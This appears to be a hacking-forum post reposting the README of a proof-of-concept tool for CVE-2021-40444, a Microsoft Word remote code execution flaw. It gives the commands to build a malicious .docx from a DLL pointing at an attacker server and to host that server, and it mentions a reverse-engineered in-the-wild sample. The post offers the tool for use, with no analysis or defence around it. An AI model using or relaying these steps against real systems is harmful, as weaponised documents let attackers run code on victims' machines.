IT News
643

CVE-2021-40444 PoC






  14-Sep-2021 22:52:59



CVE-2021-40444 PoC

Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (sudo apt-get install lcab)

Check REPRODUCE.md for manual reproduce steps

If your generated cab is not working, try pointing out exploit.html URL to calc.cab

Using

First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system()

python3 exploit.py generate test/calc.dll http://<SRV IP>


Once you generate the malicious docx (will be at out/) you can setup the server:

sudo python3 exploit.py host 80


Finally try the docx in a Windows Virtual Machine:



*Beware click the link!


DISCUSSION
Nothing comment here :(
Login for report, comment and join discussion
Login Here
Sponsored

Popular Posts
Gps Tracker Seccodeid Free Too...
General
21267
202
Top


Djie sam soe Djie sam soe
Complete Basic Course in Kali...
Linux
14301
4
Top


Djie sam soe Djie sam soe
Komintod (Ministry of Communic...
Data Leak
6457
78
Top


Murtad methamphetamine Murtad methamphetamine
Free Proxy List
Networking
3612
3
Top


Sandidi Sandidi
Mass Reverse IP Unlimited
Tools Hacking
3361
13
Top


ImamWawe ImamWawe

Related Post

Youtube Video

Subscribe